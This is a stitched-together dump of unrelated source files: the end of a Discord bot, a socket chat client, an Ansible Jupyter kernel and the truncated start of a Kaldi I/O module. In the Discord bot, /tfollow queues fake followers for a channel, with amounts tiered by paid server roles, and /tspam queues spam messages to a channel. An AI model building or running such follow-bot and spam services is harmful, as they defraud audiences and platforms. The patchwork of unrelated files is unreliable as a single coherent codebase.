if ctx.channel.type != discord.ChannelType.private:
channels = [str(x) for x in bot.get_all_channels()]
if f'ticket-{ctx.author.id}' in str(channels):
embed = discord.Embed(color=16379747, description='You already have a ticket open!')
await ctx.send(embed=embed)
else:
ticket_channel = await ctx.guild.create_text_channel(f'ticket-{ctx.author.id}')
await ticket_channel.set_permissions(ctx.guild.get_role(ctx.guild.id), send_messages=False, read_messages=False)
await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
embed = discord.Embed(color=16379747, description='Please enter the reason for this ticket, type `/close` if you want to close this ticket.')
await ticket_channel.send(f'{ctx.author.mention}', embed=embed)
await ctx.message.delete()
@bot.command()
async def close(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /close')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.name == f'ticket-{ctx.author.id}':
await ctx.channel.delete()
elif ctx.author.id in administrators and 'ticket' in ctx.channel.name:
await ctx.channel.delete()
else:
embed = discord.Embed(color=16379747, description=f'You do not have permission to run this command!')
await ctx.send(embed=embed)
@bot.command()
async def tasks(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /tasks')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel:
embed = discord.Embed(color=16379747, description=f'`{len(queue)}` tasks in the queue!')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
tfollow_cooldown = []
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def tfollow(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> /tfollow {channel}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrators:
if str(channel.lower()) in tfollow_cooldown and ctx.author.id not in administrators:
try:
await ctx.message.delete()
except:
pass
else:
try:
if '-' in str(channel):
raise Exception
max_amount = 0
if ctx.author.id in administrators:
tfollow.reset_cooldown(ctx)
max_amount += 1000
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
max_amount += 1000
diamond = discord.utils.get(ctx.guild.roles, name='Diamond')
if diamond in ctx.author.roles:
max_amount += 750
gold = discord.utils.get(ctx.guild.roles, name='Gold')
if gold in ctx.author.roles:
max_amount += 450
silver = discord.utils.get(ctx.guild.roles, name='Silver')
if silver in ctx.author.roles:
max_amount += 250
bronze = discord.utils.get(ctx.guild.roles, name='Bronze')
if bronze in ctx.author.roles:
max_amount += 100
booster = discord.utils.get(ctx.guild.roles, name='Booster')
if booster in ctx.author.roles:
max_amount += 75
_75 = discord.utils.get(ctx.guild.roles, name='+75')
if _75 in ctx.author.roles:
max_amount += 75
_25 = discord.utils.get(ctx.guild.roles, name='+25')
if _25 in ctx.author.roles:
max_amount += 25
_10 = discord.utils.get(ctx.guild.roles, name='+10')
if _10 in ctx.author.roles:
max_amount += 10
_5 = discord.utils.get(ctx.guild.roles, name='+5')
if _5 in ctx.author.roles:
max_amount += 5
max_amount += 25
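                # Worked example of the role-based limit above (role names come from
                # this server's setup): a non-admin member holding only the Gold role gets
                #   max_amount = 450 (Gold) + 25 (base) = 475
                # so '/tfollow somechannel' with no explicit amount queues 475 followers.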
if amount is None:
amount = max_amount
elif amount > max_amount:
amount = max_amount
if amount <= max_amount:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
position = len(queue) + 1
# embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`1/{position}`)')
embed = discord.Embed(color=16379747, description=f'Adding `{amount}` followers to `{channel}`! (`1/{position}`)')
await ctx.send(embed=embed)
queue.insert(0, f'tfollow-{channel}-{amount}')
else:
position = len(queue) + 1
# embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`{position}/{position}`)')
embed = discord.Embed(color=16379747, description=f'Adding `{amount}` followers to `{channel}`! (`{position}/{position}`)')
await ctx.send(embed=embed)
queue.append(f'tfollow-{channel}-{amount}')
if ctx.author.id not in administrators:
tfollow_cooldown.append(str(channel.lower()))
await asyncio.sleep(600)
tfollow_cooldown.remove(str(channel.lower()))
except:
embed = discord.Embed(color=16379747, description='An error has occurred while attempting to run this command!')
await ctx.send(embed=embed)
tfollow.reset_cooldown(ctx)
else:
await ctx.message.delete()
tfollow.reset_cooldown(ctx)
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def tspam(ctx, channel, *, msg):
print(f'{ctx.author} | {ctx.author.id} -> /tspam {channel} {msg}')
if ctx.channel.type != discord.ChannelType.private:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
if ctx.channel.id == bots_channel:
try:
max_amount = 0
if ctx.author.id in administrators:
tspam.reset_cooldown(ctx)
max_amount += 25
amount = None
if amount is None:
amount = max_amount
if amount <= max_amount:
position = len(queue) + 1
embed = discord.Embed(color=16379747, description=f'Added `tspam-{channel}-{msg}` to queue! (`1/{position}`)')
await ctx.send(embed=embed)
queue.insert(0, f'tspam-{channel}-{msg}')
except:
embed = discord.Embed(color=16379747, description='An error has occurred while attempting to run this command!')
await ctx.send(embed=embed)
tspam.reset_cooldown(ctx)
else:
await ctx.message.delete()
tspam.reset_cooldown(ctx)
else:
embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
await ctx.send(embed=embed)
rfollow_cooldown = []
bot.run(token)
|
client.py
|
import os
import socket
import threading
import sys
from time import sleep
# Const variables
if len(sys.argv) == 3:
HOST: str = str(sys.argv[1])
PORT: int = int(sys.argv[2])
else:
HOST: str = "127.0.0.1"
PORT: int = 6666
# Ask a nickname
nickname = input("Enter your nickname for the chat : ")
# Create a socket and connect to the server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((HOST, PORT))
def receive():
"""Main function to wait message from the server"""
while True:
try:
message = client.recv(1024).decode("utf8")
# If message == NICK, send the nickname to the server
if message == "NICK":
client.send(nickname.encode("utf8"))
# If message == KICKED, print a message, close the connection and exit
if message == "KICKED":
print("SERVER >> You have been kicked")
client.close()
os._exit(0)
# If message != PING show the message
elif message != "PING":
print(message)
except:
break
def write():
"""Function to get a message and send it to the server"""
while True:
try:
# Wait for a message
inputMessage = input("")
if inputMessage == "/help":
print("----- HELP -----")
print("/help : Show this help")
print("/quit : Quit the chat")
print("--------------------")
elif inputMessage == "/quit":
# Close the connection and quit
client.close()
os._exit(0)
else:
# Adding nickname to the inputMessage
message = f"{nickname} >> {inputMessage}"
# Send the message to the server
client.send(message.encode("utf8"))
except:
break
def ping(ping_every: int):
"""Ping the server to see if the server is up
Parameters
----------
ping_every : int
Time between each ping
"""
while True:
sleep(ping_every)
try:
# Send PING message to the server
client.send("PING".encode("utf8"))
except:
# If the message can't be delivered, print a notice, close the connection and quit
print("Sorry, your message can't be delivered, the server is offline")
client.close()
os._exit(0)
if __name__ == "__main__":
# Create a thread for receive()
receive_thread = threading.Thread(target=receive)
receive_thread.start()
# Create a thread for write()
write_thread = threading.Thread(target=write)
write_thread.start()
# Create a thread for ping()
receive_ping = threading.Thread(target=ping, args=(1,))
receive_ping.start()
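# Usage sketch (assumes a compatible chat server is already listening):
#   python client.py                 # connects to the default 127.0.0.1:6666
#   python client.py 10.0.0.5 7000   # host and port taken from the command line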
|
kernel.py
|
from __future__ import print_function
from ipykernel.kernelbase import Kernel
from subprocess import check_output
import pkg_resources
import atexit
import os
import io
import re
import yaml
import threading
from subprocess import Popen, STDOUT, PIPE
import logging
import json
import traceback
import tempfile
import psutil
from Queue import Queue, Empty
from collections import namedtuple
import zmq
from zmq.eventloop.zmqstream import ZMQStream
from modules import modules
from module_args import module_args
from task_args import task_args
from play_args import play_args
from ConfigParser import SafeConfigParser
from zmq.eventloop.ioloop import IOLoop
StatusMessage = namedtuple('StatusMessage', ['message'])
TaskCompletionMessage = namedtuple('TaskCompletionMessage', ['task_num'])
TASK_ARGS_MODULES = modules + task_args
__version__ = '0.3'
logger = logging.getLogger('ansible_kernel.kernel')
version_pat = re.compile(r'version (\d+(\.\d+)+)')
class AnsibleKernelHelpersThread(object):
def __init__(self, queue):
self.queue = queue
self.io_loop = IOLoop(make_current=False)
context = zmq.Context.instance()
self.pause_socket = context.socket(zmq.REP)
self.pause_socket_port = self.pause_socket.bind_to_random_port(
"tcp://127.0.0.1")
self.status_socket = context.socket(zmq.PULL)
self.status_socket_port = self.status_socket.bind_to_random_port(
"tcp://127.0.0.1")
self.pause_stream = ZMQStream(self.pause_socket, self.io_loop)
self.status_stream = ZMQStream(self.status_socket, self.io_loop)
self.pause_stream.on_recv(self.recv_pause)
self.status_stream.on_recv(self.recv_status)
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def start(self):
logger.info('thread.start')
self.thread.start()
atexit.register(self.stop)
def stop(self):
logger.info('thread.stop start')
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
logger.info('thread.stop end')
def recv_status(self, msg):
logger = logging.getLogger('ansible_kernel.kernel.recv_status')
logger.info(msg)
self.queue.put(StatusMessage(json.loads(msg[0])))
def recv_pause(self, msg):
logger = logging.getLogger('ansible_kernel.kernel.recv_pause')
logger.info("completed %s waiting...", msg)
self.queue.put(TaskCompletionMessage(json.loads(msg[0])))
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
class AnsibleKernel(Kernel):
implementation = 'ansible_kernel'
implementation_version = __version__
@property
def language_version(self):
m = version_pat.search(self.banner)
return m.group(1)
_banner = None
@property
def banner(self):
if self._banner is None:
self._banner = check_output(
['ansible', '--version']).decode('utf-8')
return self._banner
language_info = {'name': 'ansible',
'codemirror_mode': 'yaml',
'mimetype': 'text/yaml',
'file_extension': '.yml'}
help_links = [
{
'text': 'Ansible Reference',
'url': 'https://docs.ansible.com/ansible/latest/index.html'
}
]
def __init__(self, **kwargs):
Kernel.__init__(self, **kwargs)
logger = logging.getLogger('ansible_kernel.kernel.__init__')
self.ansible_cfg = None
self.ansible_process = None
self.current_play = None
self.next_task_file = None
self.task_files = []
self.playbook_file = None
self.silent = False
self.default_inventory = "[all]\nlocalhost\n"
self.default_play = yaml.dump(dict(hosts='localhost',
name='default',
gather_facts=False))
self.temp_dir = tempfile.mkdtemp(prefix="ansible_kernel_playbook")
self.queue = Queue()
self.tasks_counter = 0
self.current_task = None
logger.debug(self.temp_dir)
os.mkdir(os.path.join(self.temp_dir, 'roles'))
self.do_inventory(self.default_inventory)
self.do_execute_play(self.default_play)
def start_helper(self):
logger = logging.getLogger('ansible_kernel.kernel.start_helper')
self.helper = AnsibleKernelHelpersThread(self.queue)
self.helper.start()
logger.info("Started helper")
config = SafeConfigParser()
if self.ansible_cfg is not None:
config.readfp(io.BytesIO(self.ansible_cfg))
with open(os.path.join(self.temp_dir, 'ansible.cfg'), 'w') as f:
if not config.has_section('defaults'):
config.add_section('defaults')
config.set('defaults', 'stdout_callback', 'null')
config.set('defaults', 'callback_whitelist',
'ansible_kernel_helper')
config.set('defaults', 'callback_plugins', os.path.abspath(
pkg_resources.resource_filename('ansible_kernel', 'plugins/callback')))
if config.has_option('defaults', 'roles_path'):
roles_path = config.get('defaults', 'roles_path')
roles_path = ":".join([os.path.abspath(x) for x in roles_path.split(":")])
roles_path = "{0}:{1}".format(roles_path,
os.path.abspath(pkg_resources.resource_filename('ansible_kernel', 'roles')))
config.set('defaults', 'roles_path', roles_path)
else:
config.set('defaults', 'roles_path', os.path.abspath(
pkg_resources.resource_filename('ansible_kernel', 'roles')))
config.set('defaults', 'inventory', 'inventory')
if not config.has_section('callback_ansible_kernel_helper'):
config.add_section('callback_ansible_kernel_helper')
config.set('callback_ansible_kernel_helper',
'status_port', str(self.helper.status_socket_port))
config.write(f)
logger.info("Wrote ansible.cfg")
def rewrite_ports(self):
with open(self.playbook_file, 'r') as f:
playbook = yaml.load(f.read())
playbook[0]['tasks'][0]['pause_for_kernel']['port'] = self.helper.pause_socket_port
with open(self.playbook_file, 'w') as f:
f.write(yaml.safe_dump(playbook, default_flow_style=False))
def clean_up_task_files(self):
for task_file in self.task_files:
if os.path.exists(task_file):
os.unlink(task_file)
self.task_files = []
def process_message(self, message):
logger = logging.getLogger('ansible_kernel.kernel.process_message')
logger.info("message %s", message)
stop_processing = False
message_type = message[0]
message_data = message[1]
logger.info("message_type %s", message_type)
logger.info("message_data %s", message_data)
if message_data.get('task_name', '') == 'pause_for_kernel':
logger.debug('pause_for_kernel')
return stop_processing
if message_data.get('task_name', '') == 'include_tasks':
logger.debug('include_tasks')
if message_type == 'TaskStatus' and message_data.get('failed', False):
logger.debug('failed')
output = 'fatal: [%s]: FAILED!' % message_data['device_name']
if message_data.get('results', None):
output += " => "
output += message_data['results']
output += "\n"
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return stop_processing
output = ''
if message_type == 'TaskStart':
logger.debug('TaskStart')
output = 'TASK [%s] %s\n' % (
message_data['task_name'], '*' * (72 - len(message_data['task_name'])))
elif message_type == 'DeviceStatus':
logger.debug('DeviceStatus')
pass
elif message_type == 'PlaybookEnded':
logger.debug('PlaybookEnded')
output = "\nPlaybook ended\nContext lost!\n"
self.do_shutdown(False)
self.clean_up_task_files()
self.start_helper()
self.rewrite_ports()
self.start_ansible_playbook()
stop_processing = True
elif message_type == 'TaskStatus':
logger.debug('TaskStatus')
if message_data.get('changed', False):
logger.debug('changed')
output = 'changed: [%s]' % message_data['device_name']
elif message_data.get('unreachable', False):
logger.debug('unreachable')
output = 'fatal: [%s]: UNREACHABLE!' % message_data['device_name']
elif message_data.get('failed', False):
logger.debug('failed')
output = 'fatal: [%s]: FAILED!' % message_data['device_name']
else:
logger.debug('ok')
output = 'ok: [%s]' % message_data['device_name']
if message_data.get('results', None):
output += " => "
output += message_data['results']
output += "\n"
else:
output = str(message)
logger.info("output %s", output)
if not self.silent:
# Send standard output
logger.info("sending output")
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
else:
logger.info("silent")
logger.info("stop_processing %s", stop_processing)
return stop_processing
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
logger = logging.getLogger('ansible_kernel.kernel.do_execute')
self.silent = silent
if not code.strip():
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
logger.debug('code %r', code)
if code.strip().startswith("#inventory"):
return self.do_inventory(code)
elif code.strip().startswith("#ansible.cfg"):
return self.do_ansible_cfg(code)
elif code.strip().startswith("#host_vars"):
return self.do_host_vars(code)
elif code.strip().startswith("#group_vars"):
return self.do_group_vars(code)
elif code.strip().startswith("#vars"):
return self.do_vars(code)
elif code.strip().startswith("#template"):
return self.do_template(code)
elif code.strip().startswith("#task"):
return self.do_execute_task(code)
elif code.strip().startswith("#play"):
return self.do_execute_play(code)
else:
return self.do_execute_task(code)
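# Illustrative cell inputs handled by the dispatch above (examples only, not from
# the source):
#   '#inventory\n[webservers]\nhost1'   -> do_inventory (cell body written to ./inventory)
#   '#play\nhosts: all'                 -> do_execute_play
#   'shell: uname -a'                   -> do_execute_task (the default branch)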
def do_inventory(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_inventory')
logger.info("inventory set to %s", code)
with open(os.path.join(self.temp_dir, 'inventory'), 'w') as f:
f.write(code)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_ansible_cfg(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_ansible_cfg')
self.ansible_cfg = str(code)
config = SafeConfigParser()
if self.ansible_cfg is not None:
config.readfp(io.BytesIO(self.ansible_cfg))
logger.info("ansible.cfg set to %s", code)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_host_vars(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_host_vars')
code_lines = code.strip().splitlines(True)
host = code_lines[0][len('#host_vars'):].strip()
logger.debug("host %s", host)
host_vars = os.path.join(self.temp_dir, 'host_vars')
if not os.path.exists(host_vars):
os.mkdir(host_vars)
with open(os.path.join(host_vars, host), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_vars(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_vars')
code_lines = code.strip().splitlines(True)
vars = code_lines[0][len('#vars'):].strip()
logger.debug("vars %s", vars)
with open(os.path.join(self.temp_dir, vars), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_template(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_template')
code_lines = code.strip().splitlines(True)
template = code_lines[0][len('#template'):].strip()
logger.debug("template %s", template)
with open(os.path.join(self.temp_dir, template), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_group_vars(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_group_vars')
code_lines = code.strip().splitlines(True)
group = code_lines[0][len('#group_vars'):].strip()
logger.debug("group %s", group)
group_vars = os.path.join(self.temp_dir, 'group_vars')
if not os.path.exists(group_vars):
os.mkdir(group_vars)
with open(os.path.join(group_vars, group), 'w') as f:
f.write("".join(code_lines[1:]))
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
def do_execute_play(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_execute_play')
if self.is_ansible_alive():
self.do_shutdown(False)
self.start_helper()
code_data = yaml.load(code)
logger.debug('code_data %r', code_data)
logger.debug('code_data type: %s', type(code_data))
self.current_play = code
playbook = []
current_play = yaml.load(self.current_play)
if current_play is None:
current_play = {}
playbook.append(current_play)
tasks = current_play['tasks'] = current_play.get('tasks', [])
current_play['roles'] = current_play.get('roles', [])
for role in current_play['roles']:
if "." in role:
self.get_galaxy_role(role)
current_play['roles'].insert(0, 'ansible_kernel_helpers')
tasks.append({'pause_for_kernel': {'host': '127.0.0.1',
'port': self.helper.pause_socket_port,
'task_num': self.tasks_counter - 1}})
tasks.append(
{'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter)})
logger.debug(yaml.safe_dump(playbook, default_flow_style=False))
self.playbook_file = (os.path.join(self.temp_dir, 'playbook.yml'))
with open(self.playbook_file, 'w') as f:
f.write(yaml.safe_dump(playbook, default_flow_style=False))
# Weird work around for streaming content not showing
stream_content = {'name': 'stdout', 'text': '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
# End weird work around
self.start_ansible_playbook()
logger.info("done")
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
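# Hedged example of the playbook.yml generated above for the default play
# (the pause port varies per session; tasks_counter is 0 on the first call):
#   - hosts: localhost
#     name: default
#     gather_facts: false
#     roles: [ansible_kernel_helpers]
#     tasks:
#       - pause_for_kernel: {host: 127.0.0.1, port: <pause_port>, task_num: -1}
#       - include_tasks: next_task0.yml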
def start_ansible_playbook(self):
logger = logging.getLogger('ansible_kernel.kernel.start_ansible_playbook')
command = ['ansible-playbook', 'playbook.yml']
logger.info("command %s", command)
env = os.environ.copy()
env['ANSIBLE_KERNEL_STATUS_PORT'] = str(self.helper.status_socket_port)
self.ansible_process = Popen(command,
cwd=self.temp_dir,
env=env,
stdout=PIPE,
stderr=STDOUT)
while True:
logger.info("getting message %s", self.helper.pause_socket_port)
try:
if not self.is_ansible_alive():
logger.info("ansible is dead")
self.send_process_output()
self.do_shutdown(False)
break
msg = self.queue.get(timeout=1)
except Empty:
logger.info("Empty!")
continue
logger.info(msg)
if isinstance(msg, StatusMessage):
if self.process_message(msg.message):
break
elif isinstance(msg, TaskCompletionMessage):
logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter)
break
logger.info("done")
def send_process_output(self):
output = self.ansible_process.communicate()[0]
logger.debug("process output %s", output)
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
def do_execute_task(self, code):
logger = logging.getLogger('ansible_kernel.kernel.do_execute_task')
if self.helper is None:
output = "No play found. Run a valid play cell"
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
self.current_task = code
try:
code_data = yaml.load(code)
except Exception:
code_data = code
logger.debug('code_data %s', code_data)
logger.debug('code_data type: %s', type(code_data))
if isinstance(code_data, basestring):
if (code_data.endswith("?")):
module = code_data[:-1].split()[-1]
else:
module = code_data.split()[-1]
data = self.get_module_doc(module)
payload = dict(
source='page',
data=data,
start=0)
logging.debug('payload %s', payload)
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [payload], 'user_expressions': {}}
elif isinstance(code_data, list):
code_data = code_data[0]
elif isinstance(code_data, dict):
code_data = code_data
elif code_data is None:
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
else:
logger.error('code_data %s unsupported type', type(code_data))
if 'include_role' in code_data.keys():
role_name = code_data['include_role'].get('name', '')
if '.' in role_name:
self.get_galaxy_role(role_name)
interrupted = False
try:
tasks = []
current_task_data = yaml.load(self.current_task)
current_task_data['ignore_errors'] = True
tasks.append(current_task_data)
tasks.append({'pause_for_kernel': {'host': '127.0.0.1',
'port': self.helper.pause_socket_port,
'task_num': self.tasks_counter}})
tasks.append(
{'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter + 1)})
logger.debug(yaml.safe_dump(tasks, default_flow_style=False))
self.next_task_file = os.path.join(self.temp_dir,
'next_task{0}.yml'.format(self.tasks_counter))
self.tasks_counter += 1
self.task_files.append(self.next_task_file)
with open(self.next_task_file, 'w') as f:
f.write(yaml.safe_dump(tasks, default_flow_style=False))
logger.info('Wrote %s', self.next_task_file)
self.helper.pause_socket.send('Proceed')
while True:
logger.info("getting message %s", self.helper.pause_socket_port)
msg = self.queue.get()
logger.info(msg)
if isinstance(msg, StatusMessage):
if self.process_message(msg.message):
break
elif isinstance(msg, TaskCompletionMessage):
logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter)
break
except KeyboardInterrupt:
logger.error(traceback.format_exc())
if interrupted:
return {'status': 'abort', 'execution_count': self.execution_count}
return {'status': 'ok', 'execution_count': self.execution_count,
'payload': [], 'user_expressions': {}}
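# Hedged sketch of a generated next_task<N>.yml (N is tasks_counter when the file
# is written; the 'shell' task is just an illustrative cell body):
#   - shell: uname -a
#     ignore_errors: true
#   - pause_for_kernel: {host: 127.0.0.1, port: <pause_port>, task_num: <N>}
#   - include_tasks: next_task<N+1>.yml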
def do_complete(self, code, cursor_pos):
code = code[:cursor_pos]
default = {'matches': [], 'cursor_start': 0,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
if code.strip().startswith("#inventory"):
return default
elif code.strip().startswith("#ansible.cfg"):
return default
elif code.strip().startswith("#host_vars"):
return default
elif code.strip().startswith("#group_vars"):
return default
elif code.strip().startswith("#task"):
return self.do_complete_task(code, cursor_pos)
elif code.strip().startswith("#play"):
return self.do_complete_play(code, cursor_pos)
else:
return self.do_complete_task(code, cursor_pos)
def do_complete_task(self, code, cursor_pos):
default = {'matches': [], 'cursor_start': 0,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
logger = logging.getLogger('ansible_kernel.kernel.do_complete_task')
logger.debug('code %r', code)
if not code or code[-1] == ' ':
return default
found_module = False
code_data = None
try:
code_data = yaml.load(code)
except Exception:
try:
code_data = yaml.load(code + ":")
except Exception:
code_data = None
if code_data is not None:
logger.debug('code_data %s', code_data)
if isinstance(code_data, list) and len(code_data) > 0:
code_data = code_data[0]
if isinstance(code_data, dict):
for key in code_data.keys():
if key in modules:
module_name = key
found_module = True
break
logger.debug('found_module %s', found_module)
tokens = code.split()
if not tokens:
return default
matches = []
token = tokens[-1]
start = cursor_pos - len(token)
logger.debug('token %s', token)
if not found_module:
for module in TASK_ARGS_MODULES:
if module.startswith(token):
matches.append(module)
else:
for arg in module_args.get(module_name, []) + task_args:
if arg.startswith(token):
matches.append(arg)
if not matches:
return default
matches = [m for m in matches if m.startswith(token)]
return {'matches': sorted(matches), 'cursor_start': start,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
def do_complete_play(self, code, cursor_pos):
default = {'matches': [], 'cursor_start': 0,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
logger = logging.getLogger('ansible_kernel.kernel.do_complete_task')
logger.debug('code %r', code)
if not code or code[-1] == ' ':
return default
tokens = code.split()
if not tokens:
return default
matches = []
token = tokens[-1]
start = cursor_pos - len(token)
logger.debug('token %s', token)
for arg in play_args:
if arg.startswith(token):
matches.append(arg)
if not matches:
return default
matches = [m for m in matches if m.startswith(token)]
return {'matches': sorted(matches), 'cursor_start': start,
'cursor_end': cursor_pos, 'metadata': dict(),
'status': 'ok'}
def do_inspect(self, code, cursor_pos, detail_level=0):
logger = logging.getLogger('ansible_kernel.kernel.do_inspect')
logger.debug("code %s", code)
logger.debug("cursor_pos %s", cursor_pos)
logger.debug("detail_level %s", detail_level)
if code.strip().startswith("#inventory"):
logger.info("#inentory not supported")
return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True}
elif code.strip().startswith("#task"):
return self.do_inspect_module(code, cursor_pos, detail_level)
elif code.strip().startswith("#play"):
logger.info("#play not supported")
return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True}
else:
return self.do_inspect_module(code, cursor_pos, detail_level)
def do_inspect_module(self, code, cursor_pos, detail_level=0):
logger = logging.getLogger('ansible_kernel.kernel.do_inspect_module')
data = dict()
code_data = yaml.load(code)
logger.debug("code_data %s", code_data)
if isinstance(code_data, basestring):
module = code_data
elif isinstance(code_data, dict):
for arg in task_args:
if arg in code_data:
del code_data[arg]
module = code_data.keys()[0]
else:
logger.warn('code type not supported %s', type(code_data))
return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': False}
data.update(self.get_module_doc(module))
return {'status': 'ok', 'data': data, 'metadata': {}, 'found': True}
def get_galaxy_role(self, role_name):
logger = logging.getLogger('ansible_kernel.kernel.get_galaxy_role')
command = ['ansible-galaxy', 'list', '-p', 'roles']
logger.debug("command %s", command)
p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT)
p.wait()
exitcode = p.returncode
logger.debug('exitcode %s', exitcode)
output = p.communicate()[0]
for line in output.splitlines():
if line.startswith('- '):
role, _, version = line[2:].partition(',')
role = role.strip()
if role == role_name:
return
command = ['ansible-galaxy', 'install', '-p', 'roles', role_name]
logger.debug("command %s", command)
p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT)
p.wait()
exitcode = p.returncode
logger.debug('exitcode %s', exitcode)
output = p.communicate()[0]
logger.debug('output %s', output)
stream_content = {'name': 'stdout', 'text': str(output)}
self.send_response(self.iopub_socket, 'stream', stream_content)
def get_module_doc(self, module):
logger = logging.getLogger('ansible_kernel.kernel.get_module_doc')
data = {}
logger.debug("command %s", " ".join(
['ansible-doc', '-t', 'module', module]))
p = Popen(['ansible-doc', '-t', 'module', module],
stdout=PIPE, stderr=STDOUT)
p.wait()
exitcode = p.returncode
logger.debug('exitcode %s', exitcode)
output = p.communicate()[0]
logger.debug('output %s', output)
data['text/plain'] = output
return data
def is_ansible_alive(self):
if self.ansible_process is None:
return False
return self.ansible_process.poll() is None
def do_shutdown(self, restart):
logger = logging.getLogger('ansible_kernel.kernel.do_shutdown')
if self.ansible_process is None:
logger.debug("No ansible process")
return
try:
current_process = psutil.Process(self.ansible_process.pid)
children = current_process.children(recursive=True)
for child in children:
print('Child pid is {}'.format(child.pid))
except psutil.NoSuchProcess:
pass
if self.is_ansible_alive():
logger.info('killing ansible {0}'.format(self.ansible_process.pid))
self.ansible_process.kill()
for child in children:
logger.info('killing ansible sub {0}'.format(child.pid))
child.kill()
logger.info('stopping helper')
self.helper.stop()
self.helper = None
self.tasks_counter = 0
logger.info('clean up')
self.ansible_process = None
return {'status': 'ok', 'restart': restart}
|
kaldi_io_distill.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
#
# Modified:
# 2018 Yi Liu
import numpy as np
import sys, os, re, gzip, struct
import random
from six.moves import range
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
class FeatureReader(object):
